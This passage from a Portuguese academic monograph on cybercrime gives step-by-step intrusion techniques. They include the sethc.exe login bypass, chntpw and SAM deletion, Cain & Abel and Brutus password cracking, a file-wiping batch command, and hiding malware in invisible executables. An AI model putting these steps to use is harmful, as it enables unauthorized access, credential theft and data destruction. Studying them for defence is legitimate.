de um dos diretores da empresa). O grande erro do cracker foi comparecer pessoalmente para
receber o dinheiro na sede do banco localizado na AV. Paulista, em São Paulo, onde agentes
do Departamento de Investigações Sobre Crime Organizado (DEIC) prenderam o criminoso
(AGÊNCIA DO ESTADO, 2010).
2.9.2 Invasões
No dia 30 de maio de 2010, um domingo, o site da Ordem dos Advogados do Brasil
(OAB) foi invadido e ficou com uma imagem dizendo ser de autoria dos “Brazilians
Defacers” e contendo trocadilhos, palavras de baixo calão e frases de repúdio ao governo do
25
Presidente Lula. A imagem permaneceu no site até às 21h do domingo e, posteriormente, o
site ficou em manutenção (PAVARIN, 2010).
Nem quem comanda o país está imune. Logo após o Partido dos Trabalhadores (PT) ter
ficado mais de 24 horas com seu site fora do ar em um final de semana por um problema
decorrente de uma invasão e, também por mais de 24 horas o Partido do Movimento
Democrático Brasileiro (PMDB) ficar com o site indisponível pelo mesmo problema, no dia
19/04/2010, outro domingo, o site do Partido da Social Democracia Brasileira (PSDB)
também foi invadido. No fim de semana, o cracker invadiu o site por pelo menos duas vezes e
acrescentou a frase “Partido dos corruptos” na página inicial. Após algum tempo, o internauta
era direcionado automaticamente para uma página de autoria do cracker que expunha 40
propostas para o Brasil. O site passou toda a madrugada do sábado para o domingo fora do ar,
foi colocado no ar novamente ao meio-dia, quando sofreu um novo ataque. Por volta das 20h
da segunda-feira o site ainda encontrava-se indisponível (URIBE, 2010).
2.9.3 Sequestro
Em meados de 2010, um jovem de 19 anos foi sequestrado e mantido em cativeiro durante
cinco dias em Ilha Comprida (SP) e teve sua família aterrorizada pelos sequestradores que,
em um dos piores momentos da negociação, foi questionada, pelo sequestrador, se gostaria de
receber o dedo ou a orelha do jovem como um “presente”. Felizmente, o estudante foi
libertado pela polícia e os nove integrantes da quadrilha foram presos.
Para este trabalho acadêmico, o fato mais relevante a ser analisado neste caso de sequestro
é a forma como a quadrilha escolhia suas vítimas. A polícia informou que os sequestradores
passavam horas em sites de relacionamento na internet à procura de pessoas com sinais de
riqueza. Em outras palavras, a internet servia como uma ferramenta para os criminosos
localizarem pessoas monetariamente favorecidas, além de descobrir o comportamento das
vítimas (horário de entrada e saída de casa, entre outras informações). O pai do estudante
sequestrado reconheceu que o filho expôs informações demais na internet (G1SP, 2010).
26
3 Técnicas e conhecimentos básicos
Popularmente conhecidas como “receitas de bolo”, algumas técnicas que necessitam de
pouco ou nenhum conhecimento de informática podem ser utilizadas para obter acessos não
autorizados, danificar sistemas, obter ganhos financeiros, descobrir informações sigilosas ou,
entre as diversas aplicações possíveis, ajudar em algum dos passos dados durante a realização
de um ataque.
Uma das primeiras coisas que um cracker aprende ou procura aprender é como quebrar
senhas. Senhas de sistemas amplamente utilizados (como o Windows) têm suas brechas
frequentemente exploradas e muitas vezes as brechas encontradas permanecem abertas
durante anos.
É comum que bancos e sistemas que necessitam de segurança em nível elevado, utilizem
outras formas de autenticação de usuários privilegiados para a liberação de acessos, como, por
exemplo, autenticações biométricas, tokens (dispositivos que geram senhas diferentes após
um tempo determinado) e cartões magnéticos. Ainda assim, em sistemas 100% lógicos, a
senha ainda é a forma mais utilizada para garantir que o solicitante do acesso seja realmente a
pessoa autorizada a acessar.
3.1 Engenharia social
Com o avanço da tecnologia e algoritmos de criptografia, a quebra de senhas por métodos
puramente técnicos nem sempre é a melhor opção. Uma das falhas mais explorada em casos
de emprego de tecnologias avançadas para controle de acessos é a falha humana.
Em um sistema corporativo, obter acesso a um sistema somente com a engenharia social,
pode ser um procedimento relativamente simples. Toda grande empresa tem um sistema de
suporte ao usuário (chamado de Help Desk ou Service desk) que, em sua maioria, adota
padrões de segurança. Para o controle de acesso e proteção das senhas, uma ação adotada por
boa parte dos serviços de suporte aos usuários dos sistemas corporativos é a solicitação de
dados pessoais de seus funcionários antes de fazer a troca (reset) de uma senha.
Em grandes empresas, as senhas são frequentemente esquecidas pelos funcionários, o que
torna o trabalho de troca de senhas uma ação normal e constante por parte dos analistas de
suporte ao usuário ou pelos responsáveis por esta tarefa. Uma empresa que solicita somente o
número do CPF ou outro documento de um usuário antes de trocar sua senha, pode ter seu
27
sistema de segurança facilmente burlado. Para exemplificar o uso da engenharia social que
pode ser feito neste caso, é possível descrever um cenário no qual um funcionário (mais
conhecido como insider) foi pago por uma concorrente para obter informações sigilosas que
foram enviadas para a caixa de correio eletrônico de seu chefe ou diretor. O funcionário
criminoso pode utilizar a internet ou algum outro meio para conseguir o CPF do titular da
conta de e-mail e, simplesmente, ligar para o help desk, dizer que esqueceu a senha, confirmar
os dados da vítima e obter uma nova senha. A desvantagem deste processo é que a
possibilidade de a vítima rapidamente descobrir que há algo de errado com sua conta de e-
mail é muito alta, o que obriga o criminoso a, assim que conseguir o acesso, copiar o mais
rápido possível as informações que podem ser úteis.
3.2 Outras formas de ligar o computador
Com acesso físico a um computador, a tarefa de investigá-lo, danificá-lo ou qualquer outra
prática torna-se, obviamente, mais fácil. Obtendo-se o acesso físico ao computador e um pen-
drive, é possível descobrir senhas, visualizar arquivos e até mesmo apagar todo o conteúdo
armazenado.
Quando um computador comum é iniciado, primeiro são executadas instruções básicas
para o funcionamento do sistema e só depois disso é acessado o local onde está o sistema
operacional (como um HD com o Windows) e o computador continua a carregar os arquivos
armazenados.
Na maioria dos computadores é disponibilizada uma opção para o usuário escolher a partir
de qual local ele deseja que o sistema seja carregado. Para obter acesso total ao computador e
a tudo o que nele está instalado, uma boa solução é utilizar sistemas operacionais paralelos ou
sistemas que inicializam a partir de CD/DVD, pen-drives ou a partir da rede.
Sistemas operacionais paralelos nada mais são do que outros sistemas operacionais
instalados no mesmo computador. Sistemas que inicializam a partir de CD/DVD (também
conhecidos como Live-CDs), são sistemas operacionais, geralmente completos, que em sua
grande maioria não alteram nenhuma configuração no computador e deixam poucos ou
nenhuns rastros.
Para inicializar um computador sem a necessidade de carregar o Windows, por exemplo,
basta fazer o download de uma distribuição Live-CD do Linux, e configurar o computador
para que inicie a partir do CD. As opções de inicialização (chamadas de opções de Boot)
28
costumam variar pouco de computador para computador e, para acessá-las, deve-se digitar
uma tecla que varia entre o F2, Delete, Esc, F6, F8 e F10 logo que o computador é ligado
(antes de o sistema operacional ser carregado).
Neste trabalho, para exemplificar alguns ataques, é utilizada a quarta versão da
distribuição Back-Track do Linux. Esta distribuição foi especialmente criada para a realização
de testes de penetração, porém, outras podem ser utilizadas. Há também a possibilidade de
iniciar sistemas a partir de pen-drives e Live-CDs baseados em sistemas Windows que podem
ser facilmente encontrados digitando-se os termos “boot pendrive” e “Windows PE” nos sites
de busca.
Também é possível obter acesso total ao sistema com alguns CDs de instalação, como, por
exemplo, o DVD de instalação do Windows Vista. Para visualizar, copiar ou apagar algum
arquivo a partir de um DVD de instalação do Windows Vista é necessário configurar o
computador para que inicie pelo DVD e então aparecerá uma mensagem para apertar uma
tecla para iniciar a partir do CD ou DVD. Ao apertar uma tecla qualquer, o sistema começará
a carregar o programa de instalação. Após esta etapa, irá aparecer uma tela para a escolha do
idioma e, ao clicar em “Avançar”, o sistema trará as opções de instalar o Windows ou reparar
o computador. A opção de reparar o computador deve ser escolhida e, após a exibição da tela
apresentando a instalação a ser reparada, será mostrada a janela de recuperação do sistema,
com várias opções, inclusive o acesso às linhas de comando com opções de administrador,
como na figura abaixo.
Tela de recuperação retirada do DVD do Windows Vista. Figura 3
29
3.3 Obter acesso completo a sistemas Windows protegidos por senha
A grande maioria dos sistemas operacionais (como o MAC OS, Linux, Unix, etc.)
possuem graves brechas de segurança, porém, devido à quantidade de usuários dos sistemas
Windows, ele é o mais explorado.
Há variadas formas de se conseguir elevações de privilégios em sistemas operacionais
Windows. As mais óbvias e conhecidas são a exclusão ou descoberta de senhas de usuários
administradores. Porém, há outras formas de conseguir acesso de administrador, como a
utilização de outras contas nativas do Windows a exemplo da conta “system” (com mais
privilégios que a conta de administrador), a conta de convidado (geralmente limitada) e a
utilização de programas que utilizam outras contas mesmo quando executados por usuários
com acesso limitado.
Das técnicas mencionadas, talvez a mais utilizada e conhecida para obter acesso
privilegiado a sistemas Windows é utilizar a conta “system”. Uma forma de utilizá-la é
executar o programa que terá privilégios de sistema antes de algum usuário efetuar o logon
(acesso ao sistema). Um exemplo de como isso pode ser feito é utilizar a proteção de tela ou
as teclas de atalho do Windows, pois elas podem ser ativadas antes de algum usuário digitar
seus dados e acessar o sistema (tela de logon).
Quando configurada, a proteção de tela entra automaticamente após certo período de
tempo e o programa responsável por sua execução é o “Logon.scr”, que fica em
C:\Windows\System32 e, em versões mais antigas do Windows, os arquivos de proteção de
tela são os com extensão “.SCR” e costumam ficar na pasta C:\WINDOWS\SYSTEM.
A proteção de tela encontra-se habilitada na maioria dos sistemas Windows e, quando
executada, no caso dos sistemas mais novos, qualquer programa que tenha o nome
“Logon.scr” e estiver dentro da pasta C:\Windows\System32 será executado.
Uma desvantagem de utilizar a proteção de tela para obter acesso não autorizado é que
nem sempre ela está ativada e, mesmo quanto está, é necessária a espera de alguns minutos ou
até horas para a execução do programa. A utilização das teclas de atalho do Windows para a
execução de programas a partir da conta “system” mostra-se mais eficaz devido ao fato de ser
possível sua execução a qualquer momento (basta apertar a tecla Shift por cinco vezes) e por
estar habilitada em praticamente todos os sistemas operacionais Windows.
Na prática, para utilizar as teclas de atalho a fim de executar um programa com acessos de
sistema, deve-se renomear ou apagar o arquivo “sethc.exe” que fica no diretório
30
C:\Windows\System32, deixar dentro deste diretório o arquivo que queremos executar e
renomear o novo programa para “sethc.exe”, conforme a figura a seguinte.
Prompt de comando (cmd.exe) renomeado para “sethc.exe”. Figura 4
No figura acima, é possível visualizar o console de comandos do Windows (prompt de
comando; Programa “cmd.exe”) renomeado para “sethc.exe”. O prompt de comando fica no
mesmo diretório do programa de teclas de atalho e, a partir dele, é possível realizar diversas
ações. No exemplo do sistema acima, a qualquer momento em que a tecla Shift for
pressionada por cinco vezes consecutivas, será aberta uma janela para a inserção de linhas de
comando.
As teclas de atalho funcionam mesmo antes de algum usuário efetuar o logon (visando a
acessibilidade de usuários com necessidades especiais), portanto, caso as alterações acima
sejam feitas da maneira correta e a tecla Shift for pressionada por cinco vezes consecutivas na
tela de logon, será aberta uma janela do prompt de comando com mais privilégios que a conta
de administrador do sistema.
31
Na figura abaixo, o prompt de comandos foi utilizado para trocar a senha de um usuário
com o comando “net user nome_do_usuário senha_desejada”.
Alteração da senha. Figura 5
Alguns sistemas mais seguros substituem automaticamente o arquivo “sethc.exe”, devido
ao fato de ele ser um arquivo do sistema, e para resolver esse problema é preciso renomear
rapidamente o novo arquivo antes da substituição. A pessoa com intenções de burlar o sistema
também pode fazer a substituição do arquivo através de um Live-CD com opção de escrita,
caso não possua nem mesmo uma conta limitada no computador da vítima.
Esta técnica já é antiga e conhecida, porém, ainda funciona no mais novo sistema
operacional da Microsoft, o Windows 7, que não teve a falha corrigida. O único possível
problema que pode ocorrer no Windows Vista/7 é o sistema não permitir que o arquivo seja
renomeado. Neste caso, é preciso renomeá-lo a partir de um Live-CD ou tornar-se dono do
arquivo e liberar as permissões. Para obter a propriedade sobre o arquivo e, posteriormente,
liberar as permissões de escrita, é preciso seguir os seguintes passos:
- Clicar com o botão direito sobre o arquivo “sethc.exe”, selecionar as propriedades, clicar
na aba segurança e, posteriormente, no botão “ Avançadas”.
32
Obter propriedade de arquivo. Figura 6
-Na janela que aparecer, é preciso selecionar a aba proprietário e clicar no botão editar.
Obter propriedade de arquivo (2). Figura 7
33
Ao clicar em “Editar”, aparecerá a tela para modificar o proprietário do arquivo. Basta
escolher o novo proprietário, clicar em aplicar e em OK.
Obter propriedade de arquivo (3). Figura 8
Após obter a propriedade do arquivo, o último passo é liberar as opções de escrita no
arquivo para que seja possível renomeá-lo ou apagá-lo. Para isso, é necessário clicar
novamente com o botão direito do mouse em “sethc.exe”, selecionar a opção “Propriedades”,
aba “Segurança”, botão “Editar”, selecionar o usuário, liberar as permissões, clicar em
“Aplicar” e “Yes”.
Obtendo permissões. Figura 9
34
3.3.1 Senhas do Windows 95,98 e Millennium
Em versões antigas como as de 95, 98 e a Millennium, para acessar um sistema com
senha, bastava clicar em cancelar na tela que solicitava a senha para acesso ao sistema.
Algumas medidas de segurança podiam ser tomadas para incrementar a segurança, mas parte
das medidas poderia ser fechada ao se pressionar as teclas Ctrl+Alt+Delete no teclado e
escolhendo a opção de finalizar tarefa para encerrar o programa que bloqueava o acesso ou
apagar os arquivos com o nome do usuário e extensão “PWL” localizado em C:\WINDOWS
(OLIVEIRA, 2000).
Na figura abaixo, é possível verificar a tela de um Windows Millennium que possui
somente um usuário (chamado PI) com senha. Para deixar o sistema sem senha de acesso,
basta apagar o arquivo.
Tela do Windows Millennium. Figura 10
3.3.2 Senhas do Windows NT e 2000
Até mesmo as versões NT e 2000, consideradas mais seguras, podem ter todas as suas
senhas e contas de usuários apagadas, somente com a exclusão de arquivos. No caso destes
sistemas, o arquivo com informações de usuários e senhas é o arquivo SAM que fica
localizado na pasta C:\WINNT\system32\config. Para apagar as contas de usuários e suas
respectivas senhas, basta apagar três arquivos: na pasta C:\WINNT\system32\config os
arquivos SAM e SAM.LOG e, na pasta C:\winnt\repair, o arquivo SAM. A diferença dos
sistemas baseados no Windows NT é não ser possível a exclusão de arquivos de senhas com o
sistema funcionando e sem nenhuma ferramenta especial, pois o arquivo fica em uso. A
solução é apagá-los com outro sistema operacional instalado no computador, utilizando um
Live-cd, pen-drive com o Linux ou Windows instalado ou o CD de instalação de algum
sistema operacional.
35
3.3.3 Senhas do Windows XP, 2003, Vista e 7
No caso dos sistemas operacionais mais recentes da Microsoft, apagar ou trocar senhas
dos usuários ou administradores do sistema sem possuir uma conta nele, é uma tarefa que
exige a utilização de diferentes procedimentos ou ferramentas, pois não se resume em excluir
arquivos. Uma das formas mais simples de se obter acesso a uma conta de administrador em
sistemas operacionais Windows mais novos é utilizar algum CD de inicialização que contenha
ferramentas para realizar tal tarefa. Uma boa opção é o “Ultimate Boot CD (UBCD)” ou o
“Hiren´s BootCD”. Há também ferramentas mais avançadas e com diversas opções para a
manipulação de senhas e usuários em sistemas Windows. Para exemplificar o uso de uma
ferramenta com opções avançadas, utilizaremos o programa “chntpw” que, por padrão, já vem
instalado na distribuição “BackTrack” – do Linux.
Dentre as opções que o “chntpw” oferece estão: editar o registro do Windows, editar
opções do console de recuperação, manipular senhas de usuários, desbloquear contas e incluir
uma conta limitada no grupo dos administradores. Vale lembrar que, para alterar corretamente
uma senha em sistemas Windows mais atuais, é preciso uma informação (hash) do arquivo
“system” que fica no mesmo diretório do arquivo “SAM”. O procedimento de troca de senha
é pouco mais complexo e, neste trabalho, apenas será explicado como é feito para apagar a
senha de uma conta de um usuário do sistema. Caso seja necessário colocar uma nova senha,
basta acessar a conta (que estará sem senha) e adicionar uma.
Com o “BackTrack 4” iniciado a partir de um CD, DVD ou pendrive, é possível acessar
um HD com a instalação do Windows utilizando os seguintes comandos:
cd /
mkdir /media/teste
mount dev/hda1 /media/teste
O último comando deve ser modificado para “mount dev/sda1 /media/teste” caso o disco
rígido do computador utilize a tecnologia Serial Advanced Technology Attachment (SATA).
Em casos de problemas com o acesso ao disco rígido que contém a instalação do
Windows, pode ser necessário forçar a montagem da partição. O seguinte comando pode ser
utilizado para forçar a montagem da partição:
mount -t ntfs-3g /dev/hda1 /media/teste -o force
Após a obtenção de acesso ao local onde o Windows está instalado, é possível verificar as
opções de manipulação do sistema com o comando:
36
chntpw -i media/teste/WINDOWS/system32/config/SAM
Caso não ocorra nenhum imprevisto e o comando acima seja digitado corretamente
(levando em consideração letras maiúsculas e minúsculas), resultados conforme a imagem
seguinte deverão aparecer.
Opções para alterar o sistema Windows. Figura 11
Para apagar a senha de um usuário do sistema, a primeira opção deve ser selecionada.
Caso a tecla “enter” seja pressionada sem a escolha de nenhuma opção, automaticamente
a primeira será selecionada. Após a escolha da primeira opção, será exibida uma lista com
todos os usuários que possuem uma conta no sistema e informações como, por exemplo, se a
conta está habilitada, bloqueada, o código em número hexadecimal do Relative-Identifier
(RID) e se a conta possui privilégios de administrador. Para alterar a senha de algum usuário,
basta digitar seu respectivo nome. Caso nenhum nome de usuário e nenhum RID sejam
digitados, o usuário “Administrador” será automaticamente selecionado se a tecla “enter” for
pressionada.
37
A figura seguinte ilustra como as opções de alteração de contas de usuários são
apresentadas pelo programa.
Opções para alterar senhas dos usuários. Figura 12
Como é possível visualizar, o programa também exibe informações sobre as políticas de
senha do sistema e oferece opções para a alteração de contas de usuário.
Ao selecionar a primeira opção “Edit user data and passwords”, o aplicativo faz uma
listagem das contas de usuários (quadro vermelho). As contas que aparecem com a opção
“dis/lock” estão bloqueadas ou desabilitadas.
Após digitar o nome de um usuário ou seu respectivo RID em número hexadecimal, será
exibida uma tela onde será possível concluir a exclusão de senha de usuário. A ilustração a
seguir, destaca com setas vermelhas as opções que devem ser selecionadas para excluir com
sucesso a senha de algum usuário do sistema.
38
Como é possível verificar no exemplo abaixo, após a mensagem de sucesso apresentada
pelo aplicativo, é necessário somente salvar as alterações para que a operação seja realizada
com êxito.
Finalização do processo de exclusão de senha. Figura 13
3.3.4 Descobrir senhas sem alterá-las
O procedimento de descoberta de senha, além de mais vantajoso para um cracker ou
pessoa com más intenções, é bastante diferente e mais trabalhoso que a simples exclusão ou
troca de senha. (ASSUNÇÃO, 2002, p.55)
Para exemplificar um processo simples de quebra de senhas, foi utilizado o programa
“Cain & Abel v4.9.36” e os arquivos “SAM” e “system” de um sistema Windows XP Media
39
Center com o Service Pack 2. Este procedimento também foi testado nos sistemas
operacionais mais atuais da Microsoft e funcionou sem problemas. Também a fim de
exemplificar a obtenção dos arquivos de senha sem a necessidade de utilizar um Live-CD ou
outra forma de iniciar o sistema, foi utilizado o programa “FTK Imager v2.5.3.14”. Qualquer
forma de obtenção dos arquivos pode ser utilizada, porém, o procedimento descrito abaixo
pode ser útil para sistemas com dados criptografados ou que possuem senhas no sistema
básico de entrada e saída (BIOS) e não permitem a inicialização a partir de um dispositivo
móvel.
A obtenção dos arquivos de senha com o sistema ainda em execução é possível com a
utilização de programas para recuperação de arquivos excluídos, como o “NTFS Reader” ou,
como na imagem abaixo, o “FTK Imager”.
Obter arquivos “SAM” e “system” com o sistema em execução. Figura 14
Após obter os arquivos que contêm informações sobre as senhas, a pessoa com a
intenção de descobri-las pode abrir os arquivos “SAM” e “system” com o programa “Cain &
Abel” e escolher um dos métodos de quebra de senhas disponíveis.
40
A imagem acima ilustra as etapas realizadas para carregar os arquivos do sistema. Após a
realização das etapas, serão carregadas informações sobre todos os usuários do sistema.
Utilização do Cain. Figura 15
Este aplicativo oferece três opções para descobrir senhas de contas de usuários: ataque de
dicionário, força bruta e Rainbow Tables. Um ataque de dicionário é baseado em uma lista
(arquivo de texto) que contém uma grande quantidade de possíveis senhas. Pode ser um
método extremamente rápido e eficiente caso um bom arquivo de dicionário (wordlist) seja
utilizado. Uma Wordlist, além de comprada ou baixada da internet, pode ser criada por
programas como o “DCM” e o “Wordlist Producer” (TOMPSON, 2004, p159). O ataque de
força bruta, por sua vez, tenta todas as combinações possíveis entre caracteres que foram
previamente escolhidos.
Para armazenar as senhas dos usuários, o Windows utiliza uma sequência de números
hexadecimais (hash) para dificultar o processo de descoberta de senhas. O hash das senhas é
obtido através de um complexo cálculo matemático, o que aumenta significativamente o
tempo necessário para descobrir as senhas. Visando a diminuição deste tempo, arquivos
41
contendo uma lista de hashs já calculados (também conhecidos como Rainbow Tables)
frequentemente são utilizados com o intuito de diminuir o tempo do processo.
Para a criação de Rainbow Tables podem ser utilizadas ferramentas como o “Winrtgen”,
parte integrante do “Cain & Abel v4.9.36”.
No exemplo abaixo é utilizado um ataque de força bruta que, apesar de ser um ataque que
pode levar horas ou até mesmo anos (depende da complexidade da senha e poder de
processamento) ainda é bastante eficiente e não necessita de nenhum arquivo de dicionário ou
Rainbow Table.
Força bruta com o Cain. Figura 16
O “Cain & Abel” é uma poderosa ferramenta capaz de, entre outras coisas, descobrir
senhas de diversos sistemas por diferentes métodos. Senhas com menos de oito caracteres
podem ser descobertas com facilidade em menos de um dia. Neste exemplo, o programa levou
menos de um segundo para revelar uma senha de quatro dígitos (extremamente fraca). Na
figura anterior é possível verificar (círculo vermelho) que o aplicativo indica as possíveis
42
senhas com menos de oito dígitos.
Crackeando. Figura 17
O tempo de processamento que é necessário para a descoberta das senhas é aumentado
exponencialmente caso a senha contenha caracteres especiais e seja composta por mais do que
sete caracteres. Segundo as estimativas de tempo feitas pelo software utilizado, uma senha
que possui caracteres especiais e cerca de quatorze dígitos, pode demorar até três anos para
ser quebrada em um computador comum com processador “Core 2 Duo” de 2,3 GHz.
3.3.4.1 Senhas armazenadas no computador
Senhas armazenadas no computador, em sua grande maioria são facilmente decifradas e
não exigem tempo e processamento. O próprio “Cain & Abel” é capaz de decifrar, entre
outras senhas, as armazenadas no navegador de internet, senhas de redes sem fio e senhas de
e-mails armazenadas.
43
De forma extremamente rápida é possível visualizar todas as senhas de e-mails de todos
os usuários do computador ou todas as senhas de redes sem fio, como na figura a seguir.
Senhas das redes sem fio já acessadas. Figura 18
3.3.4.2 Invasão de contas de e-mail e sites por meio da senha
Há diversas maneiras de descobrir a senha de um e-mail. Um método que não se baseia
diretamente em erros cometidos por parte do usuário do e-mail é utilizar ferramentas que
tentam acessar o e-mail com diversas senhas até descobri-la (THOMPSON, 2004, p.150).
O “Brutus” é um programa capaz de descobrir senhas de sistemas acessados através do
protocolo Hipertext Transfer Protocol (HTTP), File Transfer Protocol (FTP.) – útil para
invasão de sites –, Post Office Protocol – protocolo de e-mail –, entre outros.
Para exemplificar a quebra de senha de uma conta de e-mail, o endereço eletrônico
“[email protected]” foi especialmente criado para este fim.
44
Na tela principal da segunda versão do programa “Brutus”, apenas alguns itens são
necessários configurar para a realização da tentativa de ataque.
Brutus. Figura 19
Como o nome sugere, o “Brutus” suporta ataques de força bruta, porém, neste exemplo,
foi utilizada uma wordlist.
Wordlist. Figura 20
45
A palavra “feliznatal” foi incluída na lista de palavras e corresponde à senha do e-mail.
Quando a utilização de wordlists é feita, a descoberta da senha somente é possível se na
lista de palavras existir a senha correta, o que leva à conclusão de que a utilização de uma boa
wordlist é fundamental para o sucesso do procedimento.
Na figura a seguir, é possível verificar a tela de sucesso de um ataque real feito à conta de
e-mail “[email protected]”. O aplicativo tentou acessar a conta com as palavras que
estavam na wordlist até encontrar a sequência de caracteres correspondente à senha correta.
Quebra de senha de e-mail. Figura 21
Os dados utilizados no ataque como o servidor de e-mail (POP3) e a respectiva porta (a
porta110 é utilizada por padrão) foram obtidos sem dificuldades ao digitar “configurar
outlook yahoo” em um site de busca na internet.
46
Para invadir um site e visualizar, copiar, excluir ou alterar arquivos um cracker pode
utilizar esta mesma ferramenta, apenas com configurações diferentes.
Além de uma boa wordlist, o sucesso do ataque a um site também vai depender de uma
boa configuração das opções “connections” e “timeout”.
Invasão de site. Figura 22
A obtenção dos dados do servidor também pode ser feita através de sites de busca, com a
procura de páginas que contêm termos como “acessar ftp nome do local de hospedagem”.
Para saber onde o site está hospedado, basta pesquisar o domínio em sites como o
“http://www.whois.net/”.
Após a obtenção da senha, para acessar o conteúdo do site a ser invadido, é possível
utilizar ferramentas dos próprios provedores de hospedagem (quando disponíveis) ou utilizar
programas como o “FileZilla” para visualizar, copiar, excluir ou modificar arquivos do site.
Em boa parte dos provedores de hospedagem, a senha do Secure Shell (SSH) é a mesma
senha do servidor FTP. Nestes casos, é possível fazer a utilização de programas como o
“PuTTY” para manipular, além do conteúdo do servidor FTP, o banco de dados do site.
47
4 Técnicas que demandam conhecimentos básicos
Neste capítulo, são abordadas técnicas que, para executá-las, é necessário possuir
conhecimentos básicos na área de informática ou, pelo menos, a leitura dos tópicos anteriores.
Os códigos dos programas e os códigos de arquivos de execução em lote contidos nesta
pesquisa foram desenvolvidos exclusivamente para esta monografia e suas finalidades se
limitam às acadêmicas.
4.1 Criação de um programa para fins maliciosos
Para criar um programa de computador, obviamente, é de extrema importância e quase
que indispensável possuir conhecimentos em linguagens de programação, porém, este
conhecimento não é um requisito obrigatório.
Atualmente, códigos prontos de vírus são distribuídos e, com apenas algumas
modificações, o código pode tornar-se personalizado. É possível encontrar até mesmo sites
especializados em automatizar o processo de desenvolvimento de vírus para computadores, o
que criou um novo predicado dentro da categoria dos hackers iniciantes: os “apertadores de
botão”, uma alusão aos botões “Next, Next e Finish” (RUFINO, 2002, p.23).
4.1.2 Arquivos de processamento em lote (batch)
Além de modificar códigos criados por outras pessoas, é possível também, a partir de
técnicas bem difundidas na internet, executar tarefas maliciosas com poucas linhas de
comandos. Um exemplo de como isso pode ser feito em um sistema Windows é abrir o
conhecido bloco de notas do Windows, digitar sem as aspas “del
%homepath%\Documents\*.* /f/s/q” e salvar o arquivo com a extensão “.bat”. Se o arquivo
for executado, todos os arquivos que estiverem na pasta “Meus Documentos” serão excluídos.
Um arquivo como o do exemplo acima, pode trazer um grande problema caso arquivos
importantes sejam apagados. Outro aspecto interessante dos arquivos em lote é que
dificilmente eles serão bloqueados por programas antivírus e podem ser distribuídos via e-
mail com maior facilidade (basta colocar em uma pasta compactada), se comparados a
programas comuns.
A partir de um arquivo de batch é possível executar diversos programas, executar
48
comandos específicos e condicionais, o que faz de um arquivo de processamento em lote, um
programa completo. O código abaixo é um programa completo (composto exclusivamente de
comandos disponíveis nas versões mais atuais dos sistemas operacionais da Microsoft) cujas
funções são: programar o computador para reiniciar, desligar, desligar computadores
remotamente, entre outras funções correlatas. Para fazer uso dele, não é necessário nenhum
compilador ou programa adicional. É preciso somente digitar os comandos abaixo em algum
editor de texto qualquer, salvar com a extensão “.bat” e executá-lo.
rem Programa para desligar o computador
rem Autor: Pedro Ramos
@echo off
color 1e
title Programa que desliga o computador
:Inicio
cls
echo.
echo 1.Desligar
echo 2.Reiniciar
echo 3.Desligar ou reiniciar outro computador da rede
echo 4.Fazer logoff
echo 5.Hibernar
echo 6.Cancelar desligamento
echo 7.Sair deste programa
echo.
set /p escolha=Escolha uma tarefa(1,2,3,4,5,6 ou 7):
if %escolha%==1 goto desligar
if %escolha%==2 goto reiniciar
if %escolha%==3 shutdown -i
if %escolha%==4 shutdown -l
if %escolha%==5 shutdown -h
if %escolha%==6 shutdown -a
if %escolha%==7 exit
goto Inicio
:desligar
49
cls
set /p seg=Tempo para o Desligamento (em segundos):
set /p msg=Digite uma mensagem de desligamento:
set /p force=Forcar desligamento (s/n):
if %force%==s set f=-f
if not %force%==s set f=
shutdown -s -t %seg% -c "%msg%" %f%
goto cancelar
:reiniciar
cls
set /p prog=Reiniciar com os programas atuais (somente para windows 7)(s/n):
if %prog%==s set r=-g
if not %prog%==s set r=-r
set /p seg=Tempo para o reinicio (em segundos):
set /p msg=Digite uma mensagem:
set /p force=Forcar reinicio (s/n):
if %force%==s set f=-f
if not %force%==s set f=
shutdown %r% -t %seg% -c "%msg%" %f%
:cancelar
cls
echo 1.Cancelar tarefa atual
echo 2.Voltar para a tela principal
echo 3.Sair do programa
set /p opcao=Escolha uma tarefa (1,2 ou 3):
if %opcao%==1 shutdown -a
if %opcao%==2 goto Inicio
if %opcao%==3 exit
goto cancelar
50
Os resultados obtidos com a execução do programa são similares aos da imagem a
seguinte.
Screenshots do batch. Figura 23
Neste trabalho, o programa é útil para demonstrar as inúmeras possibilidades de
manipulação do sistema que um arquivo de execução em lotes pode oferecer. Por exemplo,
caso algum comando que execute atividades maliciosas seja inserido nas primeiras linhas do
programa, ele será acionado e, dependendo do comando, não aparecerá na tela nem
influenciará no funcionamento do aplicativo.
4.1.2.1 Compilar um arquivo de processamento em lotes
Uma das maiores desvantagens de utilizar um simples batch para disseminar vírus de
computadores ou induzir algum usuário a executar atividades que ele não deseja é o fato do
arquivo poder ser aberto em qualquer editor de texto e ter seu código visualizado e estudado
por completo. Uma forma de corrigir este problema é transformar o arquivo de processamento
em lotes em um executável do tipo “.exe”. Com a finalidade de exemplificar o processo, serão
discutidas as funcionalidades do programa “Bat To Exe Converter v1.5”.
Após o arquivo de processamento em lotes ser criado, resta apenas carregá-lo com o “Bat
To Exe Converter”, escolher onde o novo arquivo executável será salvo e clicar em
“Compile” para criar um arquivo não visualizável em qualquer editor de texto.
51
Na imagem abaixo, é possível verificar que a opção “Invisible application” foi
selecionada, o que significa que o novo programa “apagar arquivos.exe” será executado de
forma imperceptível para o usuário.
Compilar batch. Figura 24
4.1.3 Como um vírus pode ser anexado a outro arquivo
Diversos aplicativos como o “Senna Spy EXE Maker 2001” e o “Cactus Joiner“ podem
ser utilizados para anexar um vírus a outro arquivo qualquer – como uma foto ou vídeo – e
executar o vírus de forma invisível para o usuário. O “Cactus Joiner“, por exemplo, oferece
até mesmo permissões para abrir portas no firewall de forma automática.
O sistema operacional Windows também possui um programa nativo que é capaz de
52
realizar a tarefa. Apesar de pouco utilizado e conhecido, o aplicativo pode ser executado em
versões mais recentes do Windows com o comando “iexpress”. O “Winrar”, programa
amplamente conhecido e normalmente utilizado para compactar ou descompactar arquivos,
também possui opções pouco utilizadas ou conhecidas que permitem anexar um vírus a um
arquivo qualquer e executá-lo de forma invisível.
No exemplo subsequente, será exemplificada uma forma de criar um aplicativo que o
qual, ao mesmo tempo em que executa um programa legítimo criado por outrem, de forma
transparente, executa um programa malicioso (Malware) que insere uma foto de uma caveira
como papel de parede da área de trabalho do Windows de uma maneira que não é possível
removê-la a menos que o registro do Windows seja editado. Para esta tarefa, também pode ser
utilizado o programa “Bat To Exe Converter” com a escolha de algumas opções
personalizadas.
Neste exemplo, será adicionado o programa “instalar papel de parede.bat” e a imagem
“caveira.jpg” (que ficará como o papel de parede) ao editor de textos “Atlantis.exe”.
O conteúdo do arquivo de execução em lotes é o seguinte:
